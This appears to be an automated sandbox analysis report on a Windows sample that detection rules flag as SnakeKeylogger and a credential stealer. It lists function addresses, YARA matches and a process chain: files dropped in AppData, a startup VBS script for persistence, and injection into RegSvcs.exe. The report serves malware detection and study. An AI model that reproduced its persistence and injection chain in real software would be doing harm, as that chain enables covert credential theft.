                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0139F6282_2_0139F628
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029DD2783_2_029DD278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029D53623_2_029D5362
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029DA0883_2_029DA088
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029DC1463_2_029DC146
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029DC7383_2_029DC738
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029DC4683_2_029DC468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029DCA083_2_029DCA08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029DE9883_2_029DE988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029D69A03_2_029D69A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029D3E093_2_029D3E09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029DCFAB3_2_029DCFAB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029D6FC83_2_029D6FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029DCCD83_2_029DCCD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029D29E03_2_029D29E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029DE97B3_2_029DE97B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029DF9613_2_029DF961
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064F1E803_2_064F1E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FE6B03_2_064FE6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064F17A03_2_064F17A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FFC683_2_064FFC68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064F9C703_2_064F9C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064F95483_2_064F9548
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064F0B303_2_064F0B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064F50283_2_064F5028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064F29683_2_064F2968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064F1E703_2_064F1E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FDE003_2_064FDE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FE6AE3_2_064FE6AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FEF513_2_064FEF51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FEF603_2_064FEF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064F178F3_2_064F178F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FCCA03_2_064FCCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FD5403_2_064FD540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FD5503_2_064FD550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FDDFE3_2_064FDDFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FE24A3_2_064FE24A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FE2583_2_064FE258
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FEAF83_2_064FEAF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FEB083_2_064FEB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064F93283_2_064F9328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064F0B203_2_064F0B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064F9BFA3_2_064F9BFA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064F8B913_2_064F8B91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064F8BA03_2_064F8BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FF3B83_2_064FF3B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064F00403_2_064F0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064F00063_2_064F0006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FF8023_2_064FF802
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064F50183_2_064F5018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FF8103_2_064FF810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FD0F83_2_064FD0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FD9993_2_064FD999
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064FD9A83_2_064FD9A8
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 8_2_017BF1588_2_017BF158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158C1469_2_0158C146
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015871189_2_01587118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158A0889_2_0158A088
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015853629_2_01585362
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158D2789_2_0158D278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158C4689_2_0158C468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158C7389_2_0158C738
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E9889_2_0158E988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015869A09_2_015869A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01583B959_2_01583B95
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158CA089_2_0158CA08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158CCD89_2_0158CCD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158CFA99_2_0158CFA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01583E099_2_01583E09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E97A9_2_0158E97A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158F9619_2_0158F961
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015829EC9_2_015829EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01583AA19_2_01583AA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A91E809_2_06A91E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9E2589_2_06A9E258
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A917A09_2_06A917A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A993289_2_06A99328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A90B309_2_06A90B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A950289_2_06A95028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A99C189_2_06A99C18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9FC689_2_06A9FC68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A929689_2_06A92968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9E6A09_2_06A9E6A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9E6B09_2_06A9E6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9EAF89_2_06A9EAF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9DE009_2_06A9DE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A91E709_2_06A91E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9E24A9_2_06A9E24A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A98BA09_2_06A98BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9F3B89_2_06A9F3B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9178F9_2_06A9178F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A90B209_2_06A90B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9EB089_2_06A9EB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9EF609_2_06A9EF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9EF519_2_06A9EF51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9CCA09_2_06A9CCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9D0E99_2_06A9D0E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9D0F89_2_06A9D0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9F8029_2_06A9F802
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A900069_2_06A90006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A950189_2_06A95018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9F8109_2_06A9F810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A900409_2_06A90040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9D9A89_2_06A9D9A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9D9999_2_06A9D999
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9DDFF9_2_06A9DDFF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A995489_2_06A99548
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9D5409_2_06A9D540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9D5509_2_06A9D550
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: String function: 00AB9CB3 appears 31 times
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: String function: 00AD0A30 appears 46 times
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: String function: 00ACF9F2 appears 40 times
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: String function: 008FF9F2 appears 40 times
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: String function: 00900A30 appears 46 times
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: String function: 008E9CB3 appears 31 times
                Source: RubzLi27lr.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000003.00000002.3368516346.0000000000423000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: spadixes.exe PID: 6568, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 6108, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: spadixes.exe PID: 416, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/6@4/4
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B237B5 GetLastError,FormatMessageW,0_2_00B237B5
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B110BF AdjustTokenPrivileges,CloseHandle,0_2_00B110BF
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B116C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00B116C3
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_009410BF AdjustTokenPrivileges,CloseHandle,2_2_009410BF
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_009416C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_009416C3
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B251CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00B251CD
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B3A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00B3A67C
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B2648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00B2648E
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AB42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00AB42A2
                Source: C:\Users\user\Desktop\RubzLi27lr.exeFile created: C:\Users\user\AppData\Local\HegeleosJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Users\user\Desktop\RubzLi27lr.exeFile created: C:\Users\user\AppData\Local\Temp\autC9B1.tmpJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs"
                Source: RubzLi27lr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002DAA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002DBA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003238000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.000000000321A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.000000000326A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.000000000325E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.000000000322A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: RubzLi27lr.exeVirustotal: Detection: 68%
                Source: RubzLi27lr.exeReversingLabs: Detection: 68%
                Source: C:\Users\user\Desktop\RubzLi27lr.exeFile read: C:\Users\user\Desktop\RubzLi27lr.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\RubzLi27lr.exe "C:\Users\user\Desktop\RubzLi27lr.exe"
                Source: C:\Users\user\Desktop\RubzLi27lr.exeProcess created: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe "C:\Users\user\Desktop\RubzLi27lr.exe"
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\RubzLi27lr.exe"
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe "C:\Users\user\AppData\Local\Hegeleos\spadixes.exe"
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Hegeleos\spadixes.exe"
